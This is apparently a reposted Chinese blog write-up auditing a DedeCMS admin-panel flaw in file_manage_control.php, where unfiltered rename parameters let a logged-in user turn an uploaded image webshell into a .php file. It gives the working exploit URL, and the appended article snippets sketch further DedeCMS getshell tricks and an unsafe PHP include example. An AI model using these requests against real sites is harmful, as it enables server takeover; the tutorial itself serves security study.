代码审计-dedecms任意文件名修改拿shell

最新推荐文章于 2024-05-11 14:45:00 发布
最新推荐文章于 2024-05-11 14:45:00 发布
阅读量129 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/-qing-/p/10849057.html
版权

0x01 漏洞分析

漏洞文件: dede/file_manage_control.php $fmdo 开始时赋值,所以我们可以使fmdo=rename ,使其进入 if语句 ,调用 FileManagement 对象的 RenameFile 方法,跟进 RenameFile 方法。

 

关于这里的$fmdo变量,我们可以找找这个变量怎么来的

 

Ok那这里知道这个$fmdo变量是可以我们传递控制得到。

 

那我们跟进这个RenameFile函数

 

RenameFile函数位于/dede/file_class.php:

看到 $oldname  $newname 直接拼接生成,没有对文件名进行过滤,直接导致漏洞发生。所以最终payload为:

/dede/file_manage_control.php?fmdo=rename&oldfilename=你上传文件的路径&newfilename=你想写的路径

 

 

 

0x02 漏洞利用

 

登录后台后 可以上传一个图片马

 

 

这里可以看到上传的swf文件路径,接下来构造url改名,使其变为php后缀马

访问:

http://192.168.5.149/DedeCMS-V5.7/uploads/dede/file_manage_control.php?fmdo=rename&oldfilename=/DedeCMS-V5.7/uploads/uploads/media/190511/1_1555226071.SWF&newfilename=/secquan.php

显示上传成功

 

转载于:https://www.cnblogs.com/-qing-/p/10849057.html

weixin_30553837
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计(PHP)-代码执行漏洞-DedeCMS V5.7 UTF8 SP2
iHuangZuGuang的博客
01-24 690
代码审计-代码执行漏洞-DedeCMS V5.7 UTF8 SP2 漏洞代码位于tpl.php251行-281行 此处定义savetagfile()函数:判断参数"action"是否等于savetagfile,若等于,进行下一步。 csrf_chack():csrf检验函数,需要加上token来进行绕过。token是登陆令牌,向服务器发送登录请求时,客户端会生成一个用于验证的令牌。 function csrf_check() { global $token; if(!isset($token
php审计--通过php伪协议配合文件包含写入shell
qq_29437513的博客
08-13 700
有群友问过这样一个问题,, http:xxx/123.jpg 传上这样的图片马能不能连到shell? 这有几种情况,,,php解析吧jpg解析成php,iis吧jpg解析成php都可以 我们这里通过php伪协议+存在文件包含的页面做个复现 先写个include函数,include后面没做处理的 <?php $file = $_GET['a']; include "$file"; to 然后,,如果目录阶乘符不能用,url编码后无法绕过,尝试file协议 在我本地环境www目录下存在一个无类型的a
从0学代码审计 | DedeCMS-5.5.7-sp2
2301_80115097的博客
03-20 840
继续审计和复现框架漏洞了,DedeCMS框架在我之前打鹏城杯的时候遇到过,于是找了个比较老的版本,审计一下漏洞,也算是熟悉一下该CMS的基本结构。一旦登录到了后台,就可以对源码进行修改了,所以说后台的审计的漏洞真的算漏洞吗?可能开发者就是要对后台管理员设置这么大的权限。所以后台涉及到的相关漏洞就不再分析了。声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具。
通过代码审计DedeCMS拿下CNVD证书~
最新发布
zkaqlaoniao的博客
05-11 276
这里是得到的json格式数据 我们可以通过手动的方式修改我们的1-21442Y3V.png 那么这里是上面上传的临时文件名 这里会进行删除 我们通过手动方式修改。第249行将$tmpfile = $uploadtmp./我们的文件名称移动到我们244-249的所创建的文件当中。../common.inc.php | 即可删除我们的连接数据库文件。5.我们通过上面的审计得到data/文件名称 为我们的临时位置。$tmpfile = $uploadtmp./我们的文件名称。修改为../../lynn.txt。
[php审计]Dedecms审计
anwen12的博客
10-02 403
前言: 很明显这是一篇翻译文章’ 原文:https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html 0x01 输入是怎么被处理的 function _RunMagicQuotes(&$svar) { if (!@get_magic_quotes_gpc()) { if (is_array($svar)) { foreach ($sva
DedeCMS V5.7存在任意文件删除漏洞
2301_80127209的博客
12-22 373
本文由掌控安全学院 - nocircle 投稿。
dedecms 漏洞_代码审计之二次漏洞审计
weixin_39950010的博客
11-29 423
什么是二次漏洞需要先构造好利用代码写入网站保存,在第二次或多次请求后调用攻击代码触发或者修改配置触发的漏洞叫做二次漏洞。二次漏洞有点像存储型XSS的味道,就算payload插进去了,能不能利用还得看页面输出有没有过滤。举一个简单的SQL注入例子攻击者A在网站评论的地方发表了带有注入语句的评论,这时候注入语句已经被完整地保存到数据库中但是评论引用功能存在一个SQL注入漏洞,于是攻击者在评论处引用刚提...
dedecms前台RCE代码审计复现
H4ck111的博客
10-26 1677
一、版本信息 dedecms V5.8.1 cms安装包地址:https://github.com/dedecms/DedeCMS/releases/tag/v5.8.1 成功安装cms后 来到include/common.func.php目录下 的ShowMsg()方法下
5-PHP代码审计——dedecms v5.7任意密码修改
网络安全
04-03 343
漏洞环境: DedeCMS-V5.7-GBK-SP1.tar.gz 实验环境的poc //发送GET请求 /member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1 /member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1 //获取key GET.
PHP代码审计笔记--代码执行漏洞
11-24 272
&#13;  漏洞形成原因:客户端提交的参数,未经任何过滤,传入可以执行代码的函数,造成代码执行漏洞。&#13; 常见代码注射函数:&#13;   如:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、create_function等函数  &#13;   详见http://www.cnblogs....
php代码审计工作,PHP代码审计 | CN-SEC 中文网
weixin_31300697的博客
03-25 184
代码审计结合黑盒和白盒的方法。这里多数地方是先黑盒,发现问题之后,审计代码问题在哪以及如何解决。白盒包括使用自动化代码审计工具定位可控变量,进而逐个排查变量传入函数是否有安全问题。代码审计两个关键点:1、用户的输入都是不安全的2、能传入函数的变量都是危险的带着这两个点,进入这次学习之旅!在服务器搭建cms既然是黑白结合的方法,代码审计之前附上网站目录结构以及前后台。目录结构。大概是admin目录存...
DEDECMSSHELL EXP
fengling132的专栏
04-20 852
转自:t00ls 网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell   _1 U- t( B- F8 c 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'
dedecms v5.7 sp2后台任意文件上传
公众号shadow sock7
01-24 1755
来源: https://github.com/SukaraLin/php_code_audit_project/blob/master/dedecms/dedecms v5.7 sp2 代码审计.md 上传普通图片文件,然后在后面追加php代码; 保持Content-Type为image/png。 修改上传图片文件的后缀为.php。 得到路径为: /DedeCMS-V5.7-UTF8-SP2/u...
白盒审计DeDeCMS拿到CNVD证书
Ambition_sec的博客
08-01 351
这段时间进行代码审计出了一个漏洞,也就是DeDeCMS的文件写入漏洞,是可以直接拿到网站的webshell权限的,因为现在新的版本已经发布出来了,这个漏洞也被CNVD收录所以现在写一篇篇文章,说下当时的一个审计流程。
PHPmyadmin漏洞和拿shell
热门推荐
Hacker小梦
04-06 1万+
phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。 phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用 找这个的话 用自己的写的脚本,或者搜素引擎什么的,这
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9826
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议
ElsonHY的博客
11-21 2779
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议前言0x01 环境搭建0x02 复现过程重点开始0x03 源码审计0x04 修复建议 前言 CVE-2018-20129 2018-12-11 在CVE中文申请站公布了一个 DEDECMS 5.7 SP2 最新版本中存在文件上传漏洞,具有管理员权限者可利用该漏洞上传并getshell执行任意PHP代码。 经过分析验证。该漏洞要求管理员权限登录。并且要开启会员功能,这个功能在默认情况下是不开启,需要管理员手动开启。 经过360CERT判断
php代码审计实战(一)
goddemon
07-05 3340
源码:熊海CMS_1.0 安装方法:这里是用宝塔直接搭建的 ①数据库 需要宝塔建立一个数据库导入那个数据库文件就好了 然后安装的时候输入的数据库,账户,密码跟宝塔的数据库是一样的就好了 ②php版本问题:需要将php设置为5.6才可以进行运行 且注意:如果无法运行<?php phpinfo(); ?>需要去查看短标签和php配置禁用函数 审计过程 看个人习惯和时间去确定自己的审计方法吧 我的话 快审的话: 1.过一遍功能点,然后猜存在的漏洞,找到对应的代码进行审计 2.直接seay这些审计系统通
dedecmsshell
08-24
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值